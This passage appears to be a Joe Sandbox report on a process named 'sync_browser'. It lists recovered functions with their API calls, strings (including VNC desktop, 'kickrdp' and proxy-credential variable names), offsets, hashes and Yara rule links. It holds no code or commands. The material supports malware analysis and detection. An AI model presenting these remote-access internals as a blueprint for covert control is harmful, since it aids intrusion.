API ID: PrivateProfile$FileModuleNameStringVersion
String ID: -service_run$_run$admin$clearconsole$kickrdp$service_commandline
API String ID: 769895750-1251308945
Opcode ID: 24b3510015302fc578f6c228e9c0541bd07d85315ab1c4ac955448dfc9505119
Instruction ID: fc3767ff9c90e218d3a3638557c6893166e276bdea2bc39a247324bdad02fb81
Opcode Fuzzy Hash: 24b3510015302fc578f6c228e9c0541bd07d85315ab1c4ac955448dfc9505119
Instruction Fuzzy Hash: D651816560869286EB54AB24A840AADBBA0FF85BA4FC44337EE7D436D5CF3CD445C720

Function 00007FF7D5961AE0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 114libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF7D5961B1E
GetProcAddress.KERNEL32 ref: 00007FF7D5961B36
LoadLibraryA.KERNEL32 ref: 00007FF7D5961B44
GetProcAddress.KERNEL32 ref: 00007FF7D5961B5C
FreeLibrary.KERNEL32 ref: 00007FF7D5961C51
FreeLibrary.KERNEL32 ref: 00007FF7D5961C62
FreeLibrary.KERNEL32 ref: 00007FF7D5961C71

Strings

MonitorFromPointA, xrefs: 00007FF7D5961B52
USER32, xrefs: 00007FF7D5961B17, 00007FF7D5961B3D
GetMonitorInfoA, xrefs: 00007FF7D5961B2C
(, xrefs: 00007FF7D5961B0F

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: Library$Free$AddressLoadProc
String ID: ($GetMonitorInfoA$MonitorFromPointA$USER32
API String ID: 1386263645-671781545
Opcode ID: de9e37aab11e1b949d1bdc09dbfd75982bc7ac87204d7d26c8bfb04ef9f01631
Instruction ID: d48d9bfb5ec0682de7649809418e5e2e684470f4e57faf14a2077e7eab348873
Opcode Fuzzy Hash: de9e37aab11e1b949d1bdc09dbfd75982bc7ac87204d7d26c8bfb04ef9f01631
Instruction Fuzzy Hash: 12415A3190C6028BEB68AB24E96473CA690EF95F5CFD04232CD1D462D8DF7DE488A721

Function 00007FF7D593B310 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 83COMMON

Download Yara Rule

APIs

_wgetenv.LIBCMT ref: 00007FF7D593B338

Part of subcall function 00007FF7D59E9500: _errno.LIBCMT ref: 00007FF7D59E9515
Part of subcall function 00007FF7D59E9500: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7D59E9520

_wgetenv.LIBCMT ref: 00007FF7D593B373
_wgetenv.LIBCMT ref: 00007FF7D593B3A5
_wgetenv.LIBCMT ref: 00007FF7D593B3C7
_wgetenv.LIBCMT ref: 00007FF7D593B3F5
GetUserNameA.ADVAPI32 ref: 00007FF7D593B436

Strings

SOCKS5_USER, xrefs: 00007FF7D593B331, 00007FF7D593B345
HTTP_PROXY_USER, xrefs: 00007FF7D593B3C0, 00007FF7D593B3D4
SOCKS_USER, xrefs: 00007FF7D593B39E, 00007FF7D593B3B2
SOCKS4_USER, xrefs: 00007FF7D593B36C, 00007FF7D593B380
CONNECT_USER, xrefs: 00007FF7D593B3EE, 00007FF7D593B402

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: _wgetenv$NameUser_errno_invalid_parameter_noinfo
String ID: CONNECT_USER$HTTP_PROXY_USER$SOCKS4_USER$SOCKS5_USER$SOCKS_USER
API String ID: 3057866299-2798169553
Opcode ID: a7b8bb38faf38aa79791e2a14257626f8ee9895d63d419d597d659aa22ea67ad
Instruction ID: be5c76c975e899c103b4cb09882f06000676077e14f2da0c3086bd9158d71623
Opcode Fuzzy Hash: a7b8bb38faf38aa79791e2a14257626f8ee9895d63d419d597d659aa22ea67ad
Instruction Fuzzy Hash: A731F961A1E652C2FD59BB159491ABCE692EFA4F48FC81437DE0D462A1FF3CE944C320

Function 00007FF7D5943A60 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 72registryCOMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32 ref: 00007FF7D5943A8C
RegCreateKeyExA.ADVAPI32 ref: 00007FF7D5943AF7
RegOpenKeyExA.ADVAPI32 ref: 00007FF7D5943B24
RegQueryValueExA.ADVAPI32 ref: 00007FF7D5943B6A
RegCloseKey.ADVAPI32 ref: 00007FF7D5943B79
RegCloseKey.ADVAPI32 ref: 00007FF7D5943B84

Strings

SOFTWARE\Microsoft\Windows\CurrentVersion\Policies, xrefs: 00007FF7D5943ABB
SoftwareSASGeneration, xrefs: 00007FF7D5943B4B
System, xrefs: 00007FF7D5943B0F

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: Close$CreateOpenQueryValueVersion
String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Policies$SoftwareSASGeneration$System
API String ID: 1076069355-3579764778
Opcode ID: 87e8c0d61f37e34202edbdab6bff78c1ba5551bc53e556ab61ee4318769b540b
Instruction ID: 1d3d61319e3ee4b00b7909eee60ae495cbb4e75fa957e9ee00b0438caea017ce
Opcode Fuzzy Hash: 87e8c0d61f37e34202edbdab6bff78c1ba5551bc53e556ab61ee4318769b540b
Instruction Fuzzy Hash: 9C312372618B8286EB509B20F4547AEF7A4FBC8B54FC00126EA8D47A58DF7CD155CB10

Function 00007FF7D595F790 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 63windowCOMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32 ref: 00007FF7D595F7B6
OpenDesktopA.USER32 ref: 00007FF7D595F809
EnumDesktopWindows.USER32 ref: 00007FF7D595F83C
CloseDesktop.USER32 ref: 00007FF7D595F845
SystemParametersInfoA.USER32 ref: 00007FF7D595F85B
FindWindowA.USER32 ref: 00007FF7D595F88A
PostMessageA.USER32 ref: 00007FF7D595F8A2

Strings

vncdesktop.cpp : KillScreenSaver..., xrefs: 00007FF7D595F7C4
WindowsScreenSaverClass, xrefs: 00007FF7D595F881
Screen-saver, xrefs: 00007FF7D595F7EF
vncdesktop.cpp : Killing ScreenSaver, xrefs: 00007FF7D595F817

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: Desktop$CloseEnumFindInfoMessageOpenParametersPostSystemVersionWindowWindows
String ID: Screen-saver$WindowsScreenSaverClass$vncdesktop.cpp : KillScreenSaver...$vncdesktop.cpp : Killing ScreenSaver
API String ID: 1547096108-1130181218
Opcode ID: 0218681f0ca0f0cb8045d3d881905bd2119dca5bb8d2230a423cfe654c101359
Instruction ID: 296369b72b3f225242666374a8975beeeb1c58cac0df393259fdbee1efe51e28
Opcode Fuzzy Hash: 0218681f0ca0f0cb8045d3d881905bd2119dca5bb8d2230a423cfe654c101359
Instruction Fuzzy Hash: C3315065A2869287FA64BB25E820BADA750FF98F44FC44033DD0E07699DF3CE119C720

Function 00007FF7D5934680 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 61libraryloaderCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32 ref: 00007FF7D59346A0
GetModuleHandleA.KERNEL32 ref: 00007FF7D59346C5
GetProcAddress.KERNEL32 ref: 00007FF7D59346DA
GetModuleHandleA.KERNEL32 ref: 00007FF7D59346F2
GetProcAddress.KERNEL32 ref: 00007FF7D5934707
GetTickCount.KERNEL32 ref: 00007FF7D593475E

Strings

GetSystemTimes, xrefs: 00007FF7D59346D0
ntdll.dll, xrefs: 00007FF7D59346EB
kernel32.dll, xrefs: 00007FF7D59346A8
NtQuerySystemInformation, xrefs: 00007FF7D59346FD
0, xrefs: 00007FF7D59346BE

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc$CountCriticalInitializeSectionTick
String ID: 0$GetSystemTimes$NtQuerySystemInformation$kernel32.dll$ntdll.dll
API String ID: 649669561-4005017345
Opcode ID: 074b37e70411e8fa4c2f927709ee4b204295ab1398dd26aff7224720a389b37b
Instruction ID: 7bd82a04dd81bda1b4aacaebc25043ed33c6b2c0238732dd65436e8ed8f961c8
Opcode Fuzzy Hash: 074b37e70411e8fa4c2f927709ee4b204295ab1398dd26aff7224720a389b37b
Instruction Fuzzy Hash: 18211C32A15B5587EB48AF28E844668A7E0FF88F98FC44136DD5D46398DF3CD444C760

Function 00007FF7D5948090 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 56synchronizationCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF7D59480B5
ResetEvent.KERNEL32 ref: 00007FF7D59480D2
ResetEvent.KERNEL32 ref: 00007FF7D59480DC
SetEvent.KERNEL32 ref: 00007FF7D59480E6
WaitForSingleObject.KERNEL32 ref: 00007FF7D59480F5
LeaveCriticalSection.KERNEL32 ref: 00007FF7D5948101
EnterCriticalSection.KERNEL32 ref: 00007FF7D594812E
WaitForSingleObject.KERNEL32 ref: 00007FF7D594813D
SetEvent.KERNEL32 ref: 00007FF7D594815C
LeaveCriticalSection.KERNEL32 ref: 00007FF7D594816E

Strings

c, xrefs: 00007FF7D594811E

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalEventSection$EnterLeaveObjectResetSingleWait
String ID: c
API String ID: 295735435-112844655
Opcode ID: fa268cb6b2df6a727f3079fd17a88c909c0169f6597272d12e4c6e15257d5989
Instruction ID: ed7d3efefbae668ceaa5eced0208a6450f33afead65571a760914aec6b03e30f
Opcode Fuzzy Hash: fa268cb6b2df6a727f3079fd17a88c909c0169f6597272d12e4c6e15257d5989
Instruction Fuzzy Hash: 88210C26A28B4187DA24AB25F4540AEA770FB88F90FC04033DF8E53A65DF3CE445C750

Function 00007FF7D59347C0 Relevance: 18.3, APIs: 12, Instructions: 288COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF7D59347FE
GetTickCount.KERNEL32 ref: 00007FF7D5934814
LeaveCriticalSection.KERNEL32 ref: 00007FF7D5934838

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalSection$CountEnterLeaveTick
String ID:
API String ID: 1056156058-0
Opcode ID: 4e1fcf1f9d5970b8c335a6cd4b3d0a08090c87295cd844a4afdb87dd54e77e75
Instruction ID: fe6ac6fdb55ceb854ffdbd6fa8663c942b0f0cd5f903316d86bbdbc34208c190
Opcode Fuzzy Hash: 4e1fcf1f9d5970b8c335a6cd4b3d0a08090c87295cd844a4afdb87dd54e77e75
Instruction Fuzzy Hash: 8DD11836A09B568AEB14DF69E4446ACBBE4FB84B88FC14036DE4C57B68DF38E411C750

Function 00007FF7D5940760 Relevance: 18.2, APIs: 12, Instructions: 181COMMON

Download Yara Rule

APIs

CombineRgn.GDI32 ref: 00007FF7D594079E
CombineRgn.GDI32 ref: 00007FF7D594088B
CombineRgn.GDI32 ref: 00007FF7D59408B8
CombineRgn.GDI32 ref: 00007FF7D59408EC
GetRegionData.GDI32 ref: 00007FF7D59408FC
GetRegionData.GDI32 ref: 00007FF7D5940926
GetRegionData.GDI32 ref: 00007FF7D594095F
DeleteObject.GDI32 ref: 00007FF7D594098E
free.LIBCMT ref: 00007FF7D5940999
DeleteObject.GDI32 ref: 00007FF7D59409A2
free.LIBCMT ref: 00007FF7D59409AD
DeleteObject.GDI32 ref: 00007FF7D59409B8

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: Combine$DataDeleteObjectRegion$free
String ID:
API String ID: 1378972593-0
Opcode ID: cb15224673a3dfde0a5a84031da156aebc3bdcfdfc834712c68d2b408893385e
Instruction ID: ef4ac9f59ab51572cd43977dcb604475c03d90b1851b7e72421f718645e3d4c3
Opcode Fuzzy Hash: cb15224673a3dfde0a5a84031da156aebc3bdcfdfc834712c68d2b408893385e
Instruction Fuzzy Hash: F7717FB660568187EB50DF2AD4406AEBBA0FB88FD8B849032DE4D87754DF3DD581CB40

Function 00007FF7D594DA10 Relevance: 18.1, APIs: 12, Instructions: 111COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF7D594DA63
GetRgnBox.GDI32 ref: 00007FF7D594DA7A
GetRgnBox.GDI32 ref: 00007FF7D594DABE
GetRgnBox.GDI32 ref: 00007FF7D594DAF4
GetRgnBox.GDI32 ref: 00007FF7D594DB23
DeleteObject.GDI32 ref: 00007FF7D594DB3C
free.LIBCMT ref: 00007FF7D594DB47
DeleteObject.GDI32 ref: 00007FF7D594DB5A
free.LIBCMT ref: 00007FF7D594DB65
DeleteObject.GDI32 ref: 00007FF7D594DB75
free.LIBCMT ref: 00007FF7D594DB80
LeaveCriticalSection.KERNEL32 ref: 00007FF7D594DB89

Part of subcall function 00007FF7D593F840: CreateRectRgn.GDI32 ref: 00007FF7D593F872
Part of subcall function 00007FF7D593F840: CombineRgn.GDI32 ref: 00007FF7D593F88A
Part of subcall function 00007FF7D593F840: CombineRgn.GDI32 ref: 00007FF7D593F89F

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: DeleteObjectfree$CombineCriticalSection$CreateEnterLeaveRect
String ID:
API String ID: 707770685-0
Opcode ID: e8ce359a573d540e0fad56669d64a20bc3cc88b06a8798c1e7988a6509252d61
Instruction ID: d99469b7baa8eb019614c86a2e0b92f0f7074e1eb2a7c3635b7acc85f59475a9
Opcode Fuzzy Hash: e8ce359a573d540e0fad56669d64a20bc3cc88b06a8798c1e7988a6509252d61
Instruction Fuzzy Hash: E1417D26618A4187E754AB29E4882ADB760FBC9FD4FC40232EE5E477A8CF3CD944C710

Function 00007FF7D59409E0 Relevance: 18.1, APIs: 12, Instructions: 97COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7D593F840: CreateRectRgn.GDI32 ref: 00007FF7D593F872
Part of subcall function 00007FF7D593F840: CombineRgn.GDI32 ref: 00007FF7D593F88A
Part of subcall function 00007FF7D593F840: CombineRgn.GDI32 ref: 00007FF7D593F89F

CombineRgn.GDI32 ref: 00007FF7D5940A5A
CombineRgn.GDI32 ref: 00007FF7D5940A72
CombineRgn.GDI32 ref: 00007FF7D5940A8A
GetRgnBox.GDI32 ref: 00007FF7D5940A9A
GetRgnBox.GDI32 ref: 00007FF7D5940AC2
GetRgnBox.GDI32 ref: 00007FF7D5940AE6
DeleteObject.GDI32 ref: 00007FF7D5940B06
free.LIBCMT ref: 00007FF7D5940B11
DeleteObject.GDI32 ref: 00007FF7D5940B1C
free.LIBCMT ref: 00007FF7D5940B27
DeleteObject.GDI32 ref: 00007FF7D5940B32
free.LIBCMT ref: 00007FF7D5940B3D

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: Combine$DeleteObjectfree$CreateRect
String ID:
API String ID: 3143477926-0
Opcode ID: 0a56b58438f5393381c87e283caa4a4dd7c9b87ade4efda876708c0d747ae0c3
Instruction ID: 79138df25acd2736773429e283b231717ee49eede4722a2e5f944b552b74d17f
Opcode Fuzzy Hash: 0a56b58438f5393381c87e283caa4a4dd7c9b87ade4efda876708c0d747ae0c3
Instruction Fuzzy Hash: 31417072618A8282DA50EB25E4548AEBB24FFC9FD8FC05122EE4E57768CF3CD545C710

Function 00007FF7D59355D0 Relevance: 18.0, APIs: 7, Strings: 5, Instructions: 48COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32 ref: 00007FF7D59355EC
InitializeCriticalSection.KERNEL32 ref: 00007FF7D59355F9
sprintf.LIBCMT ref: 00007FF7D5935623

Part of subcall function 00007FF7D59E7C50: _errno.LIBCMT ref: 00007FF7D59E7C88
Part of subcall function 00007FF7D59E7C50: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7D59E7C93

sprintf.LIBCMT ref: 00007FF7D5935636
sprintf.LIBCMT ref: 00007FF7D5935649
sprintf.LIBCMT ref: 00007FF7D593565C
sprintf.LIBCMT ref: 00007FF7D593566F

Strings

Unknown, xrefs: 00007FF7D5935605
12-12-2002, xrefs: 00007FF7D5935642
Plugin.dsm, xrefs: 00007FF7D5935668
0.0.0, xrefs: 00007FF7D593562F
Someone, xrefs: 00007FF7D5935655

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
